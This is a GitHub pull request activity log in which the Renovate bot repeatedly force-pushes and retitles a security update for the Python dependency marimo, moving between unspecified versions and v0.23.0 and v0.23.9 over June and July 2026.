@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from ae70632 to 94e055c Compare June 2, 2026 00:41
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 2, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 94e055c to 697147b Compare June 11, 2026 14:51
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 11, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 697147b to ef21641 Compare June 12, 2026 00:28
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 12, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from ef21641 to 293f640 Compare June 18, 2026 19:54
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 18, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 293f640 to 7735140 Compare June 19, 2026 01:42
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7735140 to de05428 Compare June 20, 2026 18:12
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo to v0.23.9 [security] Jun 20, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from de05428 to ea83d04 Compare July 12, 2026 10:44
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.9 [security] chore(deps): update dependency marimo [security] Jul 12, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants